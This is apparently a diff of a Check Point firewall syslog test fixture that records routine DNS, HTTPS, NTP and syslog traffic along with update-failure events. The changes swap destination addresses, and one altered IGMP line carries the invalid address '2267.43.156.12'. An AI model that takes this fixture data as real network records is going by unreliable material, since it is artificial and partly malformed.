+<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33445"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506772"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37364"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506772"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50738"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506772"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42644"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506772"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44668"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [flags:"166216"; ifdir:"outbound"; loguid:"{0x5e80e9d5,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; db_ver:"20032905"; description:"Update failed. Gateway can not access internet (\"https://secureupdates.checkpoint.com/appi/v4_1_1/gw/Version\"). Check connectivity and proxy settings."; product:"Application Control"; severity:"4"; update_status:"failed"]
 <134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [flags:"166216"; ifdir:"outbound"; loguid:"{0x5e80e9d5,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; db_ver:"20032905"; description:"Update failed. Gateway can not access internet (\"https://secureupdates.checkpoint.com/appi/v4_1_1/gw/Version\"). Check connectivity and proxy settings."; product:"URL Filtering"; severity:"4"; update_status:"failed"]
 <134>1 2020-03-29T18:32:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d4,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"10.0.0.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37432"; service:"443"; service_id:"https"; src:"192.168.2.2"]
@@ -3982,7 +3982,7 @@
 <134>1 2020-03-29T18:32:55Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9d7,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"10.0.0.1"; log_delay:"1585506775"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37438"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:33:07Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"393216"; ifdir:"inbound"; ifname:"eth1"; logid:"1"; loguid:"{0x5e80e9e4,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.116"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58862"; service:"443"; src:"192.168.2.2"; tcp_flags:"FIN-PUSH-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
 <134>1 2020-03-29T18:33:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9e3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"10.0.0.1"; log_delay:"1585506787"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37440"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:33:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9e5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506789"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50154"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:33:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9e5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506789"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50154"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:33:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9e7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32882"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:33:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e9f0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56248"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:33:22Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e9f2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
@@ -4025,16 +4025,16 @@
 <134>1 2020-03-29T18:42:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec1c,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50773"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T18:42:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec1c,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50774"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T18:42:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec1d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T18:42:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec1f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"2"; service_id:"igmp"; src:"192.168.2.254"]
+<134>1 2020-03-29T18:42:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec1f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"2"; service_id:"igmp"; src:"192.168.2.254"]
 <134>1 2020-03-29T18:42:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec21,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:43:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec5e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36783"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:43:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec60,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:43:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec62,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T18:43:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec63,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"63482"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T18:43:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec63,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"63482"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:43:49Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e80ec67,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.83.198.43"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54898"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
 <134>1 2020-03-29T18:44:02Z gw-da58d3 CheckPoint 8363 - [alert:"alert"; flags:"139328"; ifdir:"inbound"; ifname:"daemon"; loguid:"{0x5e80ec73,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; sequencenum:"1"; version:"5"; description:"Error occur"; product:"RAD"; reason:"Failed to fetch CP Site Resource. Couldn't resolve host name, check /opt/CPsuite-R80.40/fw1/log/rad_events/Errors/flow_5779_85_MAIN_CHILD For more details"; severity:"3"]
 <134>1 2020-03-29T18:44:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec75,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43141"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T18:44:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec7a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64111"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T18:44:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec7a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64111"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
